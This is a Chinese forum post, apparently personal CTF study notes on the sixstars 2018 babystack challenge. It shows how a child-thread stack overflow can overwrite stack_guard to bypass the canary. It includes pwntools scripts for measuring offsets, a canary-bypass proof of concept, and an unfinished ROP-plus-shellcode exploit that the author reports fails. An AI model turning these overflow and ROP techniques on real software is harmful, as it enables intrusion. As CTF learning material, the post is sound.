-
-
[原创]PWN学习笔记【canary绕过练习】【sixstars ctf2018_babystack】
-
2022-5-30 18:05 7927
-
原理[子线程栈溢出可以覆盖到stack_guard]
先测试子线程的stack_guard和canary偏移量
#!/usr/local/bin/python3 from pwn import * from LibcSearcher import LibcSearcher sh = gdb.debug('./a.out', "b *readn") sh.sendlineafter(b"send?\n", str(0x2000).encode("utf-8")) str = cyclic(0x2000) sh.send(str[:0x1000]) sh.send(str[0x1000:]) sh.interactive()
得到:
stack_guard:6120
canary:4104
构造poc
#!/usr/local/bin/python3 from pwn import * from LibcSearcher import LibcSearcher sh = gdb.debug('./a.out', "b *readn") sh.sendlineafter(b"send?\n", str(6136).encode("utf-8")) str = 'A'*4104 + 'BBBBCCCC' + 'A'*2008 + 'BBBBCCCCDDDDEEEE' sh.send(str[:0x1000]) sh.send(str[0x1000:]) sh.interactive()
成功绕过canary:
exp思路:
read(0,bss,?) 把shellcode读到bss段
然后到bss运行shellcode反弹shell
注:新版本的kali【Linux kali 5.16.0-kali7-amd64】和ubuntu 20.04,bss段没有运行权限?这个问题待解答。
gadget取参数,只有rdi和rsi,没有rdx
构造exp
#!/usr/local/bin/python3 from pwn import * from LibcSearcher import LibcSearcher context.log_level = 'debug' sh = gdb.debug('./a.out', "b *readn") elf = ELF('./a.out') read_plt = elf.plt['read'] sh.sendlineafter(b"send?\n", str(6136).encode("utf-8")) shellcode = asm(shellcraft.sh()) print(len(shellcode)) pop_rdi = 0x0000000000400c03# : pop rdi ; ret pop_rsi_r15 = 0x0000000000400c01# : pop rsi ; pop r15 ; ret bss_start = 0x602010 paload = b'A'*4104 + b'BBBBCCCC' + b'A'*8 paload += p64(pop_rdi) + p64(0) # pop rdi paload += p64(pop_rsi_r15) + p64(bss_start) + p64(0xdeadbeef) # pop rsi, r15 paload += p64(read_plt) #read(0, bss_start, ?) paload += p64(bss_start) #bss_start() paload += cyclic(1944) + b'BBBBCCCCDDDDEEEE' print("strlen %d" %len(paload)) sh.send(paload[:0x1000]) sh.send(paload[0x1000:]) sh.send(shellcode) sh.interactive()
bss没有可执行权限。。。。
不会了,学会了再接着搞
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
赞赏
他的文章
看原图